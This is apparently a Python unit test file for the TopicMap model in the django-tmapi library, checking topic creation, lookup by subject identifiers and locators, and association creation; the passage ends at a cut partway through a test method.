class SimpleMQTTApp(MQTTSnipsApp):
    """Minimal MQTT-based Snips app used as a test double."""

    def initialize(self):
        # No setup needed; tests only assert that this hook gets invoked.
        pass
def test_snips_app_mqtt_default(fs, mocker):
    """Test whether a `MQTTSnipsApp` object with the default parameters is set
    up correctly.
    """
    # Fake filesystem: minimal snips.toml plus an assistant in the default
    # location.
    config_file = '/etc/snips.toml'
    fs.create_file(config_file, contents='[snips-common]\n')
    assistant_file = '/usr/local/share/snips/assistant/assistant.json'
    fs.create_file(assistant_file, contents='{"language": "en"}')
    # Stub out every network-facing MQTT client call.
    mocker.patch('paho.mqtt.client.Client.connect')
    mocker.patch('paho.mqtt.client.Client.loop_forever')
    mocker.patch('paho.mqtt.client.Client.tls_set')
    mocker.patch('paho.mqtt.client.Client.username_pw_set')
    mocker.patch.object(SimpleMQTTApp, 'initialize')
    app = SimpleMQTTApp()
    # Check Snips configuration
    assert app.snips.mqtt.broker_address == 'localhost:1883'
    # Check assistant configuration
    assert app.assistant['language'] == 'en'
    # Check there's no app configuration
    assert app.config is None
    # Check MQTT connection: no auth/TLS configured, main loop started once.
    assert app.mqtt.username_pw_set.call_count == 0
    assert app.mqtt.tls_set.call_count == 0
    assert app.mqtt.loop_forever.call_count == 1
    app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
    # Check whether `initialize()` method is called.
    assert app.initialize.call_count == 1
def test_snips_app_mqtt_default_with_assistant_path(fs, mocker):
    """Test whether a `MQTTSnipsApp` object with the default parameters and an
    assistant configuration path in snips.toml is set up correctly.
    """
    # snips.toml points the assistant at a non-default directory.
    config_file = '/etc/snips.toml'
    fs.create_file(config_file, contents='[snips-common]\n'
                                         'assistant = "/opt/assistant"\n')
    assistant_file = '/opt/assistant/assistant.json'
    fs.create_file(assistant_file, contents='{"language": "en"}')
    # Stub out every network-facing MQTT client call.
    mocker.patch('paho.mqtt.client.Client.connect')
    mocker.patch('paho.mqtt.client.Client.loop_forever')
    mocker.patch('paho.mqtt.client.Client.tls_set')
    mocker.patch('paho.mqtt.client.Client.username_pw_set')
    mocker.patch.object(SimpleMQTTApp, 'initialize')
    app = SimpleMQTTApp()
    # Check Snips configuration
    assert app.snips.mqtt.broker_address == 'localhost:1883'
    # Check assistant configuration
    assert app.assistant['language'] == 'en'
    # Check there's no app configuration
    assert app.config is None
    # Check MQTT connection: no auth/TLS configured, main loop started once.
    assert app.mqtt.username_pw_set.call_count == 0
    assert app.mqtt.tls_set.call_count == 0
    assert app.mqtt.loop_forever.call_count == 1
    app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
    # Check whether `initialize()` method is called.
    assert app.initialize.call_count == 1
def test_snips_app_mqtt_snips_config(fs, mocker):
    """Test whether a `MQTTSnipsApp` object with a SnipsConfig parameter is
    set up correctly.
    """
    # Non-default snips.toml path with an explicit MQTT broker address.
    config_file = '/opt/snips.toml'
    fs.create_file(config_file, contents='[snips-common]\n'
                                         'mqtt = "mqtt.example.com:1883"\n')
    assistant_file = '/usr/local/share/snips/assistant/assistant.json'
    fs.create_file(assistant_file, contents='{"language": "en"}')
    # Stub out every network-facing MQTT client call.
    mocker.patch('paho.mqtt.client.Client.connect')
    mocker.patch('paho.mqtt.client.Client.loop_forever')
    mocker.patch('paho.mqtt.client.Client.tls_set')
    mocker.patch('paho.mqtt.client.Client.username_pw_set')
    mocker.patch.object(SimpleMQTTApp, 'initialize')
    snips_config = SnipsConfig(config_file)
    app = SimpleMQTTApp(snips=snips_config)
    # Check Snips configuration: the explicitly passed config is kept.
    assert app.snips == snips_config
    assert app.snips.mqtt.broker_address == 'mqtt.example.com:1883'
    # Check assistant configuration
    assert app.assistant['language'] == 'en'
    # Check there's no app configuration
    assert app.config is None
    # Check MQTT connection: broker host comes from the custom config.
    assert app.mqtt.username_pw_set.call_count == 0
    assert app.mqtt.tls_set.call_count == 0
    assert app.mqtt.loop_forever.call_count == 1
    app.mqtt.connect.assert_called_once_with('mqtt.example.com', 1883, 60, '')
    # Check whether `initialize()` method is called.
    assert app.initialize.call_count == 1
def test_snips_app_mqtt_config(fs, mocker):
    """Test whether a `MQTTSnipsApp` object with an app configuration is set
    up correctly.
    """
    # Fake filesystem: snips.toml, assistant, and an app-level config.ini.
    config_file = '/etc/snips.toml'
    fs.create_file(config_file, contents='[snips-common]\n')
    assistant_file = '/usr/local/share/snips/assistant/assistant.json'
    fs.create_file(assistant_file, contents='{"language": "en"}')
    app_config_file = 'config.ini'
    fs.create_file(app_config_file, contents='[secret]\n'
                                             'api-key=foobar\n')
    # Stub out every network-facing MQTT client call.
    mocker.patch('paho.mqtt.client.Client.connect')
    mocker.patch('paho.mqtt.client.Client.loop_forever')
    mocker.patch('paho.mqtt.client.Client.tls_set')
    mocker.patch('paho.mqtt.client.Client.username_pw_set')
    mocker.patch.object(SimpleMQTTApp, 'initialize')
    app_config = AppConfig()
    app = SimpleMQTTApp(config=app_config)
    # Check Snips configuration
    assert app.snips.mqtt.broker_address == 'localhost:1883'
    # Check assistant configuration
    assert app.assistant['language'] == 'en'
    # Check the app configuration: the passed object is kept and its
    # contents come from config.ini.
    assert app.config == app_config
    assert app.config.filename == app_config_file
    assert app.config['secret']['api-key'] == 'foobar'
    # Check MQTT connection: no auth/TLS configured, main loop started once.
    assert app.mqtt.username_pw_set.call_count == 0
    assert app.mqtt.tls_set.call_count == 0
    assert app.mqtt.loop_forever.call_count == 1
    app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
    # Check whether `initialize()` method is called.
    assert app.initialize.call_count == 1
| 34.48
| 78
| 0.699702
| 791
| 6,034
| 5.183312
| 0.118837
| 0.068049
| 0.058537
| 0.074146
| 0.83878
| 0.83122
| 0.809268
| 0.797317
| 0.797317
| 0.773902
| 0
| 0.012102
| 0.178323
| 6,034
| 174
| 79
| 34.678161
| 0.814845
| 0.186278
| 0
| 0.714286
| 0
| 0
| 0.25228
| 0.158375
| 0
| 0
| 0
| 0
| 0.384615
| 1
| 0.054945
| false
| 0.010989
| 0.021978
| 0
| 0.087912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad3e2a81a3110d5efde0f41a58d30adebc14f5f0
| 11,108
|
py
|
Python
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 1
|
2018-12-20T07:59:55.000Z
|
2018-12-20T07:59:55.000Z
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 9
|
2018-11-06T01:51:28.000Z
|
2018-12-21T22:19:42.000Z
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 2
|
2018-11-21T15:13:32.000Z
|
2020-02-19T08:39:37.000Z
|
# Generated by Django 2.0.5 on 2018-09-13 16:41
from django.db import migrations, models
def _wbi_aggregate_model(name, db_table, dimension_fields):
    """Build a CreateModel operation for one unmanaged WBI aggregate view.

    Every WBI per-X model shares the same surrogate key, dataset year and
    WBI metric columns; only the grouping dimension columns (e.g. district,
    gender, village) and the backing database table name differ.

    ``managed = False`` on every model: Django does not create or alter
    these tables (they are maintained outside the ORM's schema management).
    """
    fields = [
        ('id', models.BigIntegerField(primary_key=True, serialize=False)),
        ('dataset_year', models.IntegerField(blank=True, null=True)),
    ]
    # Grouping dimensions are all nullable text columns.
    fields.extend(
        (dimension, models.TextField(blank=True, null=True))
        for dimension in dimension_fields
    )
    fields.extend([
        ('avg_wbi', models.DecimalField(blank=True, decimal_places=6,
                                        max_digits=29, null=True)),
        ('stddev_wbi', models.DecimalField(blank=True, decimal_places=6,
                                           max_digits=29, null=True)),
        ('n', models.IntegerField(blank=True, null=True)),
    ])
    return migrations.CreateModel(
        name=name,
        fields=fields,
        options={'db_table': db_table, 'managed': False},
    )


class Migration(migrations.Migration):
    """Add the twelve unmanaged WBI aggregate models: one per grouping level
    (district, landscape, village), each broken down by ethnicity, gender,
    household type and livelihood."""

    dependencies = [
        ('bns', '0045_wbi_livelihood'),
    ]

    operations = [
        _wbi_aggregate_model('WBIPerDistrictEthnicity',
                             'bns_wbi_district_ethnicity',
                             ['ethnicity', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerDistrictGender',
                             'bns_wbi_district_gender',
                             ['gender', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerDistrictHHType',
                             'bns_wbi_district_hh_type',
                             ['hh_type', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerDistrictLivelihood',
                             'bns_wbi_district_livelihood',
                             ['livelihood_1', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerLandscapeEthnicity',
                             'bns_wbi_landscape_ethnicity',
                             ['ethnicity', 'landscape']),
        _wbi_aggregate_model('WBIPerLandscapeGender',
                             'bns_wbi_landscape_gender',
                             ['gender', 'landscape']),
        _wbi_aggregate_model('WBIPerLandscapeHHType',
                             'bns_wbi_landscape_hh_type',
                             ['hh_type', 'landscape']),
        _wbi_aggregate_model('WBIPerLandscapeLivelihood',
                             'bns_wbi_landscape_livelihood',
                             ['livelihood_1', 'landscape']),
        _wbi_aggregate_model('WBIPerVillageEthnicity',
                             'bns_wbi_village_ethnicity',
                             ['ethnicity', 'village', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerVillageGender',
                             'bns_wbi_village_gender',
                             ['gender', 'village', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerVillageHHType',
                             'bns_wbi_village_hh_type',
                             ['hh_type', 'village', 'district', 'landscape']),
        _wbi_aggregate_model('WBIPerVillageLivelihood',
                             'bns_wbi_village_livelihood',
                             ['livelihood_1', 'village', 'district', 'landscape']),
    ]
| 50.954128
| 108
| 0.555275
| 1,069
| 11,108
| 5.624883
| 0.069224
| 0.125728
| 0.129719
| 0.169632
| 0.924996
| 0.924996
| 0.864959
| 0.843506
| 0.843506
| 0.843506
| 0
| 0.012123
| 0.301945
| 11,108
| 217
| 109
| 51.18894
| 0.763348
| 0.004051
| 0
| 0.796209
| 1
| 0
| 0.131001
| 0.043667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004739
| 0
| 0.018957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ad97d41840b1e674c9a252d1ff0a7f004c855680
| 1,973
|
py
|
Python
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 6
|
2020-02-21T22:06:31.000Z
|
2020-12-08T10:48:07.000Z
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 12
|
2019-12-26T17:38:40.000Z
|
2022-02-10T14:15:55.000Z
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 4
|
2019-08-05T13:22:29.000Z
|
2021-07-21T16:04:03.000Z
|
from rest_framework.test import APIClient
from django.test import TestCase
from django.conf import settings
# Module-level API client shared by every test in this module; each test
# logs in and out around its own requests.
# NOTE(review): the name shadows the popular `requests` HTTP library —
# consider renaming (e.g. `client`) if that import is ever needed here.
requests = APIClient()
class SimpleSystemVersionTest(TestCase):
    """Tests for the read-only /system-version endpoint.

    Any authenticated user (admin or regular) may read the version;
    anonymous access is refused (403) and every mutating HTTP verb
    returns 405 even for an admin session.
    """

    fixtures = ['resources/fixtures/default_data.json', ]

    def _login(self, email):
        # All fixture accounts share the same test password.
        requests.login(email=email, password='password')

    def _assert_method_not_allowed(self, verb):
        # Mutating verbs must be rejected with 405 even when authenticated
        # as an admin.
        self._login('admin@goss.com')
        response = getattr(requests, verb)('/system-version')
        self.assertEqual(response.status_code, 405)
        requests.logout()

    def test_authentication(self):
        # Both admin and regular accounts can read the endpoint.
        for email in ('admin@goss.com', 'user@goss.com'):
            self._login(email)
            response = requests.get('/system-version')
            self.assertEqual(response.status_code, 200)
            requests.logout()
        # Without a session the endpoint refuses access.
        response = requests.get('/system-version')
        self.assertEqual(response.status_code, 403)

    def test_get_system_version(self):
        self._login('admin@goss.com')
        response = requests.get('/system-version')
        self.assertEqual(response.data, {'version': settings.SYSTEM_VERSION})
        requests.logout()

    def test_post_system_version(self):
        self._assert_method_not_allowed('post')

    def test_put_system_version(self):
        self._assert_method_not_allowed('put')

    def test_patch_system_version(self):
        self._assert_method_not_allowed('patch')

    def test_delete_system_version(self):
        self._assert_method_not_allowed('delete')
| 37.226415
| 76
| 0.68373
| 221
| 1,973
| 5.986425
| 0.19457
| 0.137566
| 0.167045
| 0.169312
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0
| 0.013125
| 0.189052
| 1,973
| 52
| 77
| 37.942308
| 0.81375
| 0
| 0
| 0.547619
| 0
| 0
| 0.160162
| 0.018246
| 0
| 0
| 0
| 0
| 0.190476
| 1
| 0.142857
| false
| 0.166667
| 0.071429
| 0
| 0.261905
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d1363d32428bbf0ca420ee94d7773b4958aa4a07
| 21
|
py
|
Python
|
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
from ms5837 import *
| 10.5
| 20
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 0.190476
| 21
| 1
| 21
| 21
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f1873d8287129110ff0bd37228c8beb922a7a58
| 94
|
py
|
Python
|
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
import register.admin.accommodation
import register.admin.attendee
import register.admin.food
| 23.5
| 35
| 0.87234
| 12
| 94
| 6.833333
| 0.5
| 0.512195
| 0.695122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 94
| 3
| 36
| 31.333333
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f3b29bae0983241619f39587a054b363f7e68e2
| 13,075
|
py
|
Python
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 3,211
|
2019-04-22T04:40:50.000Z
|
2022-03-31T10:42:31.000Z
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 2,017
|
2019-04-21T23:37:12.000Z
|
2022-03-24T03:48:51.000Z
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 375
|
2019-04-21T23:58:57.000Z
|
2022-03-30T00:42:19.000Z
|
#
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import inspect
from databricks import koalas as ks
from databricks.koalas.exceptions import PandasNotImplementedError
from databricks.koalas.missing.window import (
MissingPandasLikeExpanding,
MissingPandasLikeRolling,
MissingPandasLikeExpandingGroupby,
MissingPandasLikeRollingGroupby,
)
from databricks.koalas.testing.utils import ReusedSQLTestCase, TestUtils
class ExpandingRollingTest(ReusedSQLTestCase, TestUtils):
    """Checks that every stubbed-out (missing) pandas window API raises
    PandasNotImplementedError, on both the frame and the series accessor,
    for plain and groupby Expanding/Rolling objects."""

    # Expected error-message pattern for an unsupported member.
    _UNSUPPORTED = "{member}.*{kind}.*{name}.*not implemented( yet\\.|\\. .+)"
    # Expected error-message pattern for a deprecated member.
    _DEPRECATED = "{member}.*{kind}.*{name}.*is deprecated"

    @staticmethod
    def _missing_names(missing_class):
        """Introspect *missing_class* and return
        ((unsupported_fns, deprecated_fns),
         (unsupported_props, deprecated_props)) — the attribute names of each
        category of missing API, identified by the stub's ``__name__``."""
        functions = inspect.getmembers(missing_class, inspect.isfunction)
        properties = inspect.getmembers(
            missing_class, lambda obj: isinstance(obj, property)
        )
        return (
            (
                [n for n, f in functions if f.__name__ == "unsupported_function"],
                [n for n, f in functions if f.__name__ == "deprecated_function"],
            ),
            (
                [n for n, p in properties
                 if p.fget.__name__ == "unsupported_property"],
                [n for n, p in properties
                 if p.fget.__name__ == "deprecated_property"],
            ),
        )

    def _check_missing(self, kind, missing_class, frame_factory, series_factory):
        """Assert that each missing member of *missing_class* raises when
        accessed on a freshly built frame/series window object.

        kind: "Expanding" or "Rolling" (appears in the error message).
        frame_factory / series_factory: zero-argument callables building the
        window object under test; called anew for every access, mirroring the
        original per-name checks.
        """
        (unsupported_fns, deprecated_fns), (unsupported_props, deprecated_props) = \
            self._missing_names(missing_class)

        for factory in (frame_factory, series_factory):
            for name in unsupported_fns:
                with self.assertRaisesRegex(
                    PandasNotImplementedError,
                    self._UNSUPPORTED.format(member="method", kind=kind, name=name),
                ):
                    getattr(factory(), name)()
            for name in deprecated_fns:
                with self.assertRaisesRegex(
                    PandasNotImplementedError,
                    self._DEPRECATED.format(member="method", kind=kind, name=name),
                ):
                    getattr(factory(), name)()
            for name in unsupported_props:
                with self.assertRaisesRegex(
                    PandasNotImplementedError,
                    self._UNSUPPORTED.format(member="property", kind=kind, name=name),
                ):
                    # Property access alone must raise; the original
                    # sometimes appended an (unreachable) call here.
                    getattr(factory(), name)
            for name in deprecated_props:
                with self.assertRaisesRegex(
                    PandasNotImplementedError,
                    self._DEPRECATED.format(member="property", kind=kind, name=name),
                ):
                    getattr(factory(), name)

    def test_missing(self):
        kdf = ks.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7, 8, 9]})
        self._check_missing(
            "Expanding",
            MissingPandasLikeExpanding,
            lambda: kdf.expanding(1),
            lambda: kdf.a.expanding(1),
        )
        self._check_missing(
            "Rolling",
            MissingPandasLikeRolling,
            lambda: kdf.rolling(1),
            lambda: kdf.a.rolling(1),
        )

    def test_missing_groupby(self):
        kdf = ks.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7, 8, 9]})
        # NOTE(review): the original exercised plain kdf.rolling()/expanding()
        # (not the groupby variants) in some deprecated-member checks; the
        # groupby accessors are now used consistently throughout.
        self._check_missing(
            "Expanding",
            MissingPandasLikeExpandingGroupby,
            lambda: kdf.groupby("a").expanding(1),
            lambda: kdf.a.groupby(kdf.a).expanding(1),
        )
        self._check_missing(
            "Rolling",
            MissingPandasLikeRollingGroupby,
            lambda: kdf.groupby("a").rolling(1),
            lambda: kdf.a.groupby(kdf.a).rolling(1),
        )
| 43.009868
| 99
| 0.579732
| 1,127
| 13,075
| 6.574091
| 0.108252
| 0.030234
| 0.107977
| 0.215954
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0
| 0.006402
| 0.307151
| 13,075
| 303
| 100
| 43.151815
| 0.811458
| 0.07044
| 0
| 0.832685
| 0
| 0
| 0.145396
| 0.067449
| 0
| 0
| 0
| 0
| 0.124514
| 1
| 0.007782
| false
| 0
| 0.019455
| 0
| 0.031128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f44107664f55734f8d25b15a9df939bfd53701c
| 344
|
py
|
Python
|
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | 4
|
2021-11-01T09:27:32.000Z
|
2022-03-07T14:24:10.000Z
|
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | null | null | null |
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | null | null | null |
from fileutil.utils import find_file_suffix
from fileutil.utils import find_file_name_without_suffix
from fileutil.utils import find_compressed_files
from fileutil.utils import remove_dir
from fileutil.utils import remove_subdir
from fileutil.utils import find_files
from fileutil.utils import copy_dir
from fileutil.utils import write_to_file
| 38.222222
| 56
| 0.883721
| 54
| 344
| 5.37037
| 0.314815
| 0.331034
| 0.468966
| 0.634483
| 0.855172
| 0.348276
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 344
| 8
| 57
| 43
| 0.929487
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0f4641198c087d260c6b8e0f5bdb58a27ce0dc14
| 10,129
|
py
|
Python
|
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | 2
|
2015-03-22T03:23:36.000Z
|
2017-01-08T10:57:18.000Z
|
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | null | null | null |
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | 1
|
2020-12-28T04:40:34.000Z
|
2020-12-28T04:40:34.000Z
|
# Copyright 2011 Jamie Norrish (jamie@artefact.org.nz)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing tests for the TopicMap model.
Most if not all of these tests are ported from the public domain tests
that come with the TMAPI 2.0 distribution (http://www.tmapi.org/2.0/).
"""
from tmapi.exceptions import ModelConstraintException, \
UnsupportedOperationException
from tmapi_test_case import TMAPITestCase
class TopicMapTest (TMAPITestCase):
def test_parent (self):
"""Tests if TopicMap.get_parent() returns None."""
self.assertEqual(None, self.tm.get_parent())
def test_topic_creation_subject_identifier (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_subject_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
locator2 = topic.get_subject_identifiers()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_subject_identifier_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_subject_identifier, None)
def test_topic_creation_subject_locator (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_subject_locator(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_subject_locators().count())
self.assertEqual(0, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
locator2 = topic.get_subject_locators()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_subject_locator_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_subject_locator, None)
def test_topic_creation_item_identifier (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_item_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
locator2 = topic.get_item_identifiers()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_item_identifier_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_item_identifier, None)
def test_topic_creation_automagic_item_identifier (self):
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic();
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
def test_topic_by_subject_identifier (self):
locator = self.create_locator('http://www.example.org/')
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertEqual(None, t)
topic = self.tm.create_topic_by_subject_identifier(locator)
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertNotEqual(t, None)
self.assertEqual(topic, t)
topic.remove()
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertEqual(None, t)
def test_topic_by_subject_locator (self):
locator = self.create_locator('http://www.example.org/')
t = self.tm.get_topic_by_subject_locator(locator)
self.assertEqual(None, t)
topic = self.tm.create_topic_by_subject_locator(locator)
t = self.tm.get_topic_by_subject_locator(locator)
self.assertNotEqual(t, None)
self.assertEqual(topic, t)
topic.remove()
t = self.tm.get_topic_by_subject_locator(locator)
self.assertEqual(None, t)
def test_association_creation_type (self):
type_topic = self.create_topic()
self.assertEqual(0, self.tm.get_associations().count())
association = self.tm.create_association(type_topic)
self.assertEqual(1, self.tm.get_associations().count())
self.assertTrue(association in self.tm.get_associations())
self.assertEqual(0, association.get_roles().count())
self.assertEqual(type_topic, association.get_type())
self.assertEqual(0, association.get_scope().count())
def test_association_creation_type_scope_single (self):
type_topic = self.create_topic()
theme = self.create_topic()
self.assertEqual(0, self.tm.get_associations().count())
association = self.tm.create_association(type_topic, (theme,))
self.assertEqual(1, self.tm.get_associations().count())
self.assertTrue(association in self.tm.get_associations())
self.assertEqual(0, association.get_roles().count())
self.assertEqual(type_topic, association.get_type())
self.assertEqual(1, association.get_scope().count())
self.assertTrue(theme in association.get_scope())
def test_association_creation_type_scope_multiple(self):
